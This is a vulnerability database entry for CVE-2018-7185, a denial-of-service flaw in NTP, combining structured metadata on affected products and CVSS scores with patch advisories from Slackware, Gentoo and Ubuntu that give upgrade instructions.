Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz

Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz

Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 14.0 package: 01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz

Slackware x86_64 14.0 package: b2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz

Slackware 14.1 package: 78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz

Slackware x86_64 14.1 package: e0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz

Slackware 14.2 package: 81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz

Slackware x86_64 14.2 package: d2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz

Slackware -current package: c3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz

Slackware x86_64 -current package: fa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the package as root:

upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz

Then, restart the NTP daemon:

sh /etc/rc.d/rc.ntpd restart

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK 13MAnR04OluKfiEsJVgO6uWJKXy2HOGq =FRx7 -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201803-1822",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "ntp",
        "version": "4.2.8"
      },
      {
        "model": "fujitsu m10-4s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp2361"
      },
      {
        "model": "fujitsu m10-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp2361"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "vs960hd",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "2.2.3-1505"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "fujitsu m12-2",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp3070"
      },
      {
        "model": "fujitsu m12-2",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp2361"
      },
      {
        "model": "fujitsu m10-4s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp3070"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "virtual diskstation manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.1.6-15266"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "fujitsu m12-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp2361"
      },
      {
        "model": "fujitsu m10-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp3070"
      },
      {
        "model": "fujitsu m10-4",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp2361"
      },
      {
        "model": "fujitsu m12-2s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp2361"
      },
      {
        "model": "diskstation manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "synology",
        "version": "5.2"
      },
      {
        "model": "hci",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fujitsu m12-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp3070"
      },
      {
        "model": "ntp",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.2.8"
      },
      {
        "model": "router manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "synology",
        "version": "1.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.10"
      },
      {
        "model": "ntp",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.2.6"
      },
      {
        "model": "diskstation manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.1.6-15266"
      },
      {
        "model": "fujitsu m10-4",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp3070"
      },
      {
        "model": "fujitsu m12-2s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "xcp3070"
      },
      {
        "model": "router manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "1.1.6-6931-3"
      },
      {
        "model": "skynas",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.1.5-15254"
      },
      {
        "model": "hpux-ntp",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "hpe",
        "version": "c.4.2.8.4.0"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "ntp",
        "version": "4.2.6"
      },
      {
        "model": "ntp",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ntp",
        "version": "4.2.6 thats all  4.2.8p11"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "diskstation manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "router manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "skynas",
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "virtual diskstation manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "vs960hd",
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.3"
      },
      {
        "model": "4.2.8p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p8",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p7",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.8p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.7p385",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.7p366",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.7p22",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.7p111",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "4.2.7p11",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.14"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.4.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.50"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.6"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.5"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.13"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.12"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.11"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.10"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "4.2.8p11",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "103339"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:ntp:ntp",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:slackware:slackware_linux",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:synology:diskstation_manager",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:synology:router_manager",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:synology:skynas",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:synology:virtual_diskstation_manager",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:synology:vs960hd_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Miroslav Lichvar of Red Hat.",
    "sources": [
      {
        "db": "BID",
        "id": "103339"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2018-7185",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2018-7185",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-137217",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2018-7185",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2018-7185",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2018-7185",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2018-7185",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201803-141",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-137217",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the \"other side\" of an interleaved association causing the victim ntpd to reset its association. ntp Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nNTP version 4.2.6 prior to 4.2.8p11 are vulnerable. protocol engine is one of the protocol engines. This issue only affected Ubuntu\n17.10 and Ubuntu 18.04 LTS. This issue only affected Ubuntu 17.10 and Ubuntu\n18.04 LTS. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201805-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: NTP: Multiple vulnerabilities\n     Date: May 26, 2018\n     Bugs: #649612\n       ID: 201805-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to remote code execution. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/ntp               \u003c 4.2.8_p11              \u003e= 4.2.8_p11 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p11\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-7170\n      https://nvd.nist.gov/vuln/detail/CVE-2018-7170\n[ 2 ] CVE-2018-7182\n      https://nvd.nist.gov/vuln/detail/CVE-2018-7182\n[ 3 ] CVE-2018-7183\n      https://nvd.nist.gov/vuln/detail/CVE-2018-7183\n[ 4 ] CVE-2018-7184\n      https://nvd.nist.gov/vuln/detail/CVE-2018-7184\n[ 5 ] CVE-2018-7185\n      https://nvd.nist.gov/vuln/detail/CVE-2018-7185\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201805-12\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. ==========================================================================\nUbuntu Security Notice USN-3707-2\nJanuary 23, 2019\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in NTP. \n\nSoftware Description:\n- ntp: Network Time Protocol daemon and utility programs\n\nDetails:\n\nUSN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. This\nupdate provides the corresponding update for Ubuntu 12.04 ESM. \n\nOriginal advisory details:\n\n Miroslav Lichvar discovered that NTP incorrectly handled certain\n spoofed addresses when performing rate limiting. \n (CVE-2016-7426)\n\n Matthew Van Gundy discovered that NTP incorrectly handled certain\n crafted broadcast mode packets. \n (CVE-2016-7427, CVE-2016-7428)\n\n Matthew Van Gundy discovered that NTP incorrectly handled certain\n control mode packets. A remote attacker could use this issue to set or\n unset traps. (CVE-2016-9310)\n\n Matthew Van Gundy discovered that NTP incorrectly handled the trap\n service. (CVE-2016-9311)\n\n It was discovered that the NTP legacy DPTS refclock driver incorrectly\n handled the /dev/datum device. (CVE-2017-6462)\n\n It was discovered that NTP incorrectly handled certain invalid\n settings in a :config directive. A remote authenticated user could\n possibly use this issue to cause NTP to crash, resulting in a denial\n of service. (CVE-2017-6463)\n\n Michael Macnair discovered that NTP incorrectly handled certain\n responses. A remote attacker could possibly use this issue to execute\n arbitrary code. (CVE-2018-7183)\n\n Miroslav Lichvar discovered that NTP incorrectly handled certain\n zero-origin timestamps. (CVE-2018-7185)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n  ntp                             1:4.2.6.p3+dfsg-1ubuntu3.12\n\nIn general, a standard system update will make all the necessary\nchanges. \n\nReferences:\n  https://usn.ubuntu.com/usn/usn-3707-2\n  https://usn.ubuntu.com/usn/usn-3707-1\n  CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-9310,\n  CVE-2016-9311, CVE-2017-6462, CVE-2017-6463, CVE-2018-7183,\n  CVE-2018-7185\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security]  ntp (SSA:2018-060-02)\n\nNew ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz:  Upgraded. \n  This release addresses five security issues in ntpd:\n  * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability:\n    ephemeral association attack. While fixed in ntp-4.2.8p7, there are\n    significant additional protections for this issue in 4.2.8p11. \n    Reported by Matt Van Gundy of Cisco. \n  * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer\n    read overrun leads to undefined behavior and information leak. \n    Reported by Yihan Lian of Qihoo 360. \n  * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\n    ephemeral associations. Reported on the questions@ list. \n  * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode\n    cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. \n  * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet\n    can reset authenticated interleaved association. \n    Reported by Miroslav Lichvar of Red Hat. \n  For more information, see:\n    http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n01c86ddfabec68d52877336258d064c7  ntp-4.2.8p11-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nb2d36d96f9a4d84df3586d38b8b47389  ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n78b4e9221e725dcb45160950bfc926d0  ntp-4.2.8p11-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0d32ed484e02ad28c59838e6407d549  ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n81690d8e511b403f0fe89c1d120f5049  ntp-4.2.8p11-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd2c877e3d1b9c7ce003ef090c7610c74  ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc3ee95d3944b09c2e891883dc5411a6f  n/ntp-4.2.8p11-i586-1.txz\n\nSlackware x86_64 -current package:\nfa9c7a8aca0c769791e34a8e48e6d260  n/ntp-4.2.8p11-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address.      |\n+------------------------------------------------------------------------+\n-----BEGIN PGP 